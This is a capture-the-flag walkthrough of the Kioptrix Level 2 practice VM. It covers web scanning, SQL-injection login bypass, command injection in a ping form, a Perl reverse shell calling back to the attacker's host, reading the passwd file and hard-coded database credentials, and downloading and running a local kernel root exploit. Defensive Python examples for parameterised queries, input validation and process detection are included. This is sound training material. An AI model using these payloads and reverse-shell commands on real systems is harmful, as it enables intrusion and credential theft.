+ http://192.168.180.138/manual/ru/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ru/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/ru/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ssl/ ----
+ http://192.168.180.138/manual/ssl/index.html (CODE:200|SIZE:3988)            
                                                                               
---- Entering directory: http://192.168.180.138/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/developer/ ----
+ http://192.168.180.138/manual/de/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/faq/ ----
+ http://192.168.180.138/manual/de/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/howto/ ----
+ http://192.168.180.138/manual/de/howto/index.html (CODE:200|SIZE:5685)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/misc/ ----
+ http://192.168.180.138/manual/de/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/mod/ ----
+ http://192.168.180.138/manual/de/mod/index.html (CODE:200|SIZE:13561)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/programs/ ----
+ http://192.168.180.138/manual/de/programs/index.html (CODE:200|SIZE:4664)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/ssl/ ----
+ http://192.168.180.138/manual/de/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/developer/ ----
+ http://192.168.180.138/manual/en/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/faq/ ----
+ http://192.168.180.138/manual/en/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/howto/ ----
+ http://192.168.180.138/manual/en/howto/index.html (CODE:200|SIZE:5685)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/misc/ ----
+ http://192.168.180.138/manual/en/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/mod/ ----
+ http://192.168.180.138/manual/en/mod/index.html (CODE:200|SIZE:13437)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/programs/ ----
+ http://192.168.180.138/manual/en/programs/index.html (CODE:200|SIZE:4664)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/ssl/ ----
+ http://192.168.180.138/manual/en/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/developer/ ----
+ http://192.168.180.138/manual/fr/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/faq/ ----
+ http://192.168.180.138/manual/fr/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/howto/ ----
+ http://192.168.180.138/manual/fr/howto/index.html (CODE:200|SIZE:5685)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/misc/ ----
+ http://192.168.180.138/manual/fr/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/mod/ ----
+ http://192.168.180.138/manual/fr/mod/index.html (CODE:200|SIZE:13437)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/programs/ ----
+ http://192.168.180.138/manual/fr/programs/index.html (CODE:200|SIZE:4664)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/ssl/ ----
+ http://192.168.180.138/manual/fr/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/developer/ ----
+ http://192.168.180.138/manual/ja/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/faq/ ----
+ http://192.168.180.138/manual/ja/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/howto/ ----
+ http://192.168.180.138/manual/ja/howto/index.html (CODE:200|SIZE:5607)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/misc/ ----
+ http://192.168.180.138/manual/ja/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/mod/ ----
+ http://192.168.180.138/manual/ja/mod/index.html (CODE:200|SIZE:13298)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/programs/ ----
+ http://192.168.180.138/manual/ja/programs/index.html (CODE:200|SIZE:4664)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/ssl/ ----
+ http://192.168.180.138/manual/ja/ssl/index.html (CODE:200|SIZE:3957)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/developer/ ----
+ http://192.168.180.138/manual/ko/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/faq/ ----
+ http://192.168.180.138/manual/ko/faq/index.html (CODE:200|SIZE:3371)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/howto/ ----
+ http://192.168.180.138/manual/ko/howto/index.html (CODE:200|SIZE:5299)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/misc/ ----
+ http://192.168.180.138/manual/ko/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/mod/ ----
+ http://192.168.180.138/manual/ko/mod/index.html (CODE:200|SIZE:12795)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/programs/ ----
+ http://192.168.180.138/manual/ko/programs/index.html (CODE:200|SIZE:4543)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/ssl/ ----
+ http://192.168.180.138/manual/ko/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/developer/ ----
+ http://192.168.180.138/manual/ru/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/faq/ ----
+ http://192.168.180.138/manual/ru/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/howto/ ----
+ http://192.168.180.138/manual/ru/howto/index.html (CODE:200|SIZE:5685)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/misc/ ----
+ http://192.168.180.138/manual/ru/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/mod/ ----
+ http://192.168.180.138/manual/ru/mod/index.html (CODE:200|SIZE:13437)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/programs/ ----
+ http://192.168.180.138/manual/ru/programs/index.html (CODE:200|SIZE:5016)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/ssl/ ----
+ http://192.168.180.138/manual/ru/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Tue Aug  9 02:13:55 2016
DOWNLOADED: 262884 - FOUND: 102


nikto -h 192.168.180.138
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.180.138
+ Target Hostname:    192.168.180.138
+ Target Port:        80
+ Start Time:         2016-08-09 02:15:09 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ Retrieved x-powered-by header: PHP/4.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /manual/, fields: 0x5770d 0x1c42 0xac5f9a00;5770b 0x206 0x84f07cc0 
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8346 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2016-08-09 02:15:36 (GMT-4) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

In the HTML source, a comment near the end of the body reveals that the admin user is called Administator:
<html>
<body>
<form method="post" name="frmLogin" id="frmLogin" action="index.php">
<table width="300" border="1" align="center" cellpadding="2" cellspacing="2">
<tr>
<td colspan='2' align='center'>
<b>Remote System Administration Login</b>
</td>
</tr>
<tr>
<td width="150">Username</td>
<td><input name="uname" type="text"></td>
</tr>
<tr>
<td width="150">Password</td>
<td>
<input name="psw" type="password">
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="btnLogin" value="Login">
</td>
</tr>
</table>
</form>

<!-- Start of HTML when logged in as Administator -->
</body>
</html>

Let us try a SQL injection with the following username and password:
Administrator
' OR '1'='1
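To see why that username/password pair logs us in, here is the login check written as a vulnerable and a hardened version. This is an added example in Python with an in-memory SQLite table, not the target's PHP/MySQL code (which the page does not show); the users table, its column names and the sample account are constructed.

```python
"""Login check behind a form like the one above: a string-concatenated query
beside a parameterised one.  Added example (Python/sqlite3 stand-in for the
target's PHP/MySQL app); the 'users' table and the sample account are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory table standing in for the application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed sample account, not a real credential from the target.
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret-Example')")
    conn.commit()
    return conn


def vulnerable_query(uname: str, psw: str) -> str:
    """Builds the SQL text the way the vulnerable form handler would: the
    user's input is pasted into the statement and becomes part of its syntax."""
    return (f"SELECT COUNT(*) FROM users WHERE username = '{uname}' "
            f"AND password = '{psw}'")


def login_vulnerable(conn: sqlite3.Connection, uname: str, psw: str) -> bool:
    """With psw = "' OR '1'='1" the WHERE clause becomes
    (username = '...' AND password = '') OR '1'='1', which is always true."""
    return conn.execute(vulnerable_query(uname, psw)).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, uname: str, psw: str) -> bool:
    """Parameterised query: the driver binds the input as data, so the same
    payload is compared literally against the stored password and fails."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (uname, psw)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print(vulnerable_query("Administrator", payload))
    print("vulnerable:", login_vulnerable(db, "Administrator", payload))  # True
    print("safe:      ", login_safe(db, "Administrator", payload))        # False
```

A real application should also compare a salted password hash rather than the stored password itself, but the structural fix is the bound parameter: no value of uname or psw can close the quote and append an OR.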

After logging in we get a panel that allows us to ping a host. Let us try appending a second command to the address:
ping 127.0.0.1&whoami
Output:
apache

One more test:
ping 127.0.0.1&perl -v

This is perl, v5.8.5 built for i386-linux-thread-multi

Copyright 1987-2004, Larry Wall

Perl may be copied only under the terms of either the Artistic License or the
GNU General Public License, which may be found in the Perl 5 source kit.

Complete documentation for Perl, including FAQ lists, should be found on
this system using `man perl' or `perldoc perl'.  If you have access to the
Internet, point your browser at http://www.perl.com/, the Perl Home Page.
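The two tests above work because the ping panel hands the field to a shell. The following is an added example in Python, not the target's pingit.php (whose source is not on the page, so the handler shape, one host field pasted into a command string, is an assumption): it shows how the shell reads the injected field, the hardened handler that validates the address and runs ping without a shell, and a detection check for request logs.

```python
"""Ping handler like the target's pingit.php, vulnerable and hardened.
Added example in Python; pingit.php's real source is not on the page, so the
handler shape (one host field pasted into a shell command) is an assumption."""
import ipaddress
import re
import shlex
import subprocess

# Characters a POSIX shell uses to chain or redirect commands.
SHELL_META = re.compile(r"[;&|`$<>\n]")


def vulnerable_command(host: str) -> str:
    """The string the vulnerable handler passes to /bin/sh -c.  The field is
    concatenated verbatim, so the shell, not ping, decides what it means."""
    return f"ping {host}"


def commands_in(shell_string: str) -> list:
    """Split a command line the way sh would, at ';', '&', '|', '&&', '||'.
    Shows that '127.0.0.1&whoami' yields two commands, not one odd hostname."""
    lexer = shlex.shlex(shell_string, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in (";", "&", "|", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def safe_command(host: str) -> list:
    """Hardened version: accept only a syntactically valid IP address and build
    an argv list.  No shell runs, so no character in the field can start a
    second command; anything that is not an address is rejected outright."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError(f"rejected ping target: {host!r}") from None
    return ["ping", "-c", "1", str(addr)]


def run_safe(host: str) -> str:
    """Execute the validated argv without a shell and with a timeout."""
    result = subprocess.run(safe_command(host), capture_output=True,
                            text=True, timeout=10, check=False)
    return result.stdout


def looks_like_injection(field: str) -> bool:
    """Detection-side check for access logs or a WAF rule: a ping target
    containing shell metacharacters is never legitimate."""
    return SHELL_META.search(field) is not None


if __name__ == "__main__":
    field = "127.0.0.1&whoami"
    print(commands_in(vulnerable_command(field)))  # [['ping', '127.0.0.1'], ['whoami']]
    print(looks_like_injection(field))             # True
    try:
        safe_command(field)
    except ValueError as err:
        print(err)
```

Allow-listing the input (an IP address or a hostname matching a strict pattern) and passing an argv list are the two halves of the fix; escaping the field for the shell is a weaker substitute because it has to anticipate every metacharacter.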

Great! Let's get a shell:
ping 127.0.0.1&perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.180.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

On our end:
 nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.180.132] from (UNKNOWN) [192.168.180.138] 32770
whoami
apache
ls
index.php
pingit.php
uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Reading the application's PHP source shows the database credentials hard-coded in clear text:

<?php
// MySQL user and password in clear text in the web application source
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
john:x:500:500::/home/john:/bin/bash
harold:x:501:501::/home/harold:/bin/bash

ps -aux
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4  3588  548 ?        S    Aug08   0:00 init [3]                                   
root         2  0.0  0.0     0    0 ?        SN   Aug08   0:00 [ksoftirqd/0]
root         3  0.0  0.0     0    0 ?        S<   Aug08   0:00 [events/0]
root         4  0.0  0.0     0    0 ?        S<   Aug08   0:00 [khelper]
root         5  0.0  0.0     0    0 ?        S<   Aug08   0:00 [kacpid]
root        82  0.0  0.0     0    0 ?        S<   Aug08   0:00 [kblockd/0]
root        83  0.0  0.0     0    0 ?        S    Aug08   0:00 [khubd]
root       100  0.0  0.0     0    0 ?        S    Aug08   0:00 [pdflush]
root       101  0.0  0.0     0    0 ?        S    Aug08   0:00 [pdflush]
root       102  0.0  0.0     0    0 ?        S    Aug08   0:00 [kswapd0]
root       103  0.0  0.0     0    0 ?        S<   Aug08   0:00 [aio/0]
root       249  0.0  0.0     0    0 ?        S    Aug08   0:00 [kseriod]
root       482  0.0  0.0     0    0 ?        S<   Aug08   0:00 [ata/0]
root       483  0.0  0.0     0    0 ?        S<   Aug08   0:00 [ata_aux]
root       498  0.0  0.0     0    0 ?        S    Aug08   0:00 [kjournald]
root      1745  0.0  0.3  3120  440 ?        S<s  Aug08   0:00 udevd
root      1785  0.0  0.0     0    0 ?        S    Aug08   0:00 [shpchpd_event]
root      1862  0.0  0.0     0    0 ?        S<   Aug08   0:00 [kauditd]
root      1974  0.0  0.0     0    0 ?        S    Aug08   0:00 [kjournald]
root      2692  0.0  0.5  2432  680 ?        Ss   Aug08   0:00 /sbin/dhclient -1 -q -lf /var/lib/dhcp/dhclient-eth0.leases -pf /var/run/dhclient-eth0.pid eth0
root      2731  0.0  0.4  2196  540 ?        Ss   Aug08   0:00 syslogd -m 0
root      2735  0.0  0.3  1536  384 ?        Ss   Aug08   0:00 klogd -x
rpc       2762  0.0  0.4  2424  600 ?        Ss   Aug08   0:00 portmap
rpcuser   2781  0.0  0.6  3772  852 ?        Ss   Aug08   0:00 rpc.statd
root      2807  0.0  0.2  5504  368 ?        Ss   Aug08   0:00 rpc.idmapd
root      2880  0.0  0.3  3400  444 ?        Ss   Aug08   0:00 /usr/sbin/acpid
root      2964  0.0  0.9  5432 1140 ?        Ss   Aug08   0:00 /usr/sbin/sshd
root      2977  0.0  0.6  3352  768 ?        Ss   Aug08   0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root      2995  0.0  1.6  8436 2044 ?        Ss   Aug08   0:00 sendmail: accepting connections
smmsp     3004  0.0  1.2  6932 1632 ?        Ss   Aug08   0:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue
root      3014  0.0  0.2  2936  352 ?        Ss   Aug08   0:00 gpm -m /dev/input/mice -t imps2
root      3023  0.0  0.7  6184  936 ?        Ss   Aug08   0:00 crond
xfs       3044  0.0  1.0  3940 1300 ?        Ss   Aug08   0:00 xfs -droppriv -daemon
root      3061  0.0  0.3  3128  428 ?        Ss   Aug08   0:00 /usr/sbin/atd
dbus      3070  0.0  0.6  2604  804 ?        Ss   Aug08   0:00 dbus-daemon-1 --system
root      3079  0.0  4.5  8808 5772 ?        Ss   Aug08   0:00 hald
root      3399  0.0  0.5  3328  680 ?        Ss   Aug08   0:00 dhclient
root      3401  0.0  8.1 22088 10272 ?       Ss   Aug08   0:00 httpd
root      3427  0.0  0.9  4460 1236 ?        S    Aug08   0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --err-log=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
mysql     3469  0.0 14.8 127236 18736 ?      Sl   Aug08   0:00 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock
root      3499  0.0  0.3  3124  388 tty1     Ss+  Aug08   0:00 /sbin/mingetty tty1
root      3500  0.0  0.3  3300  384 tty2     Ss+  Aug08   0:00 /sbin/mingetty tty2
root      3501  0.0  0.3  3460  388 tty3     Ss+  Aug08   0:00 /sbin/mingetty tty3
root      3502  0.0  0.3  3444  388 tty4     Ss+  Aug08   0:00 /sbin/mingetty tty4
root      3503  0.0  0.3  2928  384 tty5     Ss+  Aug08   0:00 /sbin/mingetty tty5
root      3504  0.0  0.3  2964  388 tty6     Ss+  Aug08   0:00 /sbin/mingetty tty6
root      4973  0.0  1.7  9564 2256 ?        SNs  Aug08   0:00 cupsd
apache    5112  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5113  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5114  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5115  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5116  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5117  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5118  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5119  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache   10408  0.0  2.3  7560 3020 ?        S    00:01   0:00 perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.180.132:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
apache   10482  0.0  0.6  3600  796 ?        R    00:05   0:00 ps -aux
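From the defender's side, the process list above is the artifact to look for: an interpreter owned by the web server account, with no terminal, sitting next to the httpd workers. The following is an added example in Python (not the page's own tooling) that parses ps output and flags such processes; the sample lines are constructed from the listing above, with the perl one-liner shortened to "...".

```python
"""Flag processes that the web server account should not be running.  Added
example; PS_SAMPLE is constructed from the ps listing above."""
import os

# Accounts under which web server workers normally run.
WEB_USERS = {"apache", "www-data", "httpd", "nginx"}
# The only program those accounts are expected to execute on this host
# (an assumption: adjust to what the web stack legitimately spawns).
EXPECTED = {"httpd"}
# Programs that indicate a shell or scripting runtime was launched from a request.
INTERPRETERS = {"perl", "python", "php", "sh", "bash", "nc", "ncat", "socat"}

PS_SAMPLE = """\
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root      3401  0.0  8.1 22088 10272 ?       Ss   Aug08   0:00 httpd
apache    5112  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache    5113  0.0  4.7 22088 5976 ?        S    Aug08   0:00 httpd
apache   10408  0.0  2.3  7560 3020 ?        S    00:01   0:00 perl -MIO -e ...
apache   10482  0.0  0.6  3600  796 ?        R    00:05   0:00 ps -aux
"""


def parse_ps(text: str) -> list:
    """Parse 'ps aux' style output into dicts.  The first ten columns are
    fixed; everything after them is the command line, which may contain spaces."""
    rows = []
    for line in text.splitlines():
        fields = line.split(None, 10)
        if len(fields) < 11 or fields[0] == "USER":
            continue
        rows.append({"user": fields[0], "pid": int(fields[1]),
                     "tty": fields[6], "command": fields[10]})
    return rows


def suspicious_processes(text: str) -> list:
    """Return (pid, reason, command) for processes that a web server account
    runs but that are not its expected worker binary."""
    findings = []
    for proc in parse_ps(text):
        if proc["user"] not in WEB_USERS:
            continue
        program = os.path.basename(proc["command"].split()[0])
        if program in EXPECTED:
            continue
        if program in INTERPRETERS:
            reason = "interpreter launched by web server account"
        else:
            reason = "unexpected program for web server account"
        findings.append((proc["pid"], reason, proc["command"]))
    return findings


if __name__ == "__main__":
    for pid, reason, command in suspicious_processes(PS_SAMPLE):
        print(f"PID {pid}: {reason}: {command}")
```

On a live host the same check runs over `ps aux` output or a walk of /proc; the useful refinement is to also record the parent PID, because a perl or sh whose parent is an httpd worker is a much stronger signal than one started from cron.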


cat /etc/issue

Welcome to Kioptrix Level 2 Penetration and Assessment Environment

--The object of this game:
|_Acquire "root" access to this machine.

There are many ways this can be done, try and find more then one way to
appreciate this exercise.

DISCLAIMER: Kioptrix is not resposible for any damage or instability
caused by running, installing or using this VM image.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)

Good luck and have fun!

Ok, nice info. The kernel (2.6.9-55.EL from 2007, see uname above) is old, so let's exploit it locally:


wget -P /tmp/ http://192.168.180.132/9542.c
gcc /tmp/9542.c -o /tmp/9542
bash -i

exec /tmp/9542
whoami
root

Game over.

Best Regards,
Yuriy Stacnhev/URIX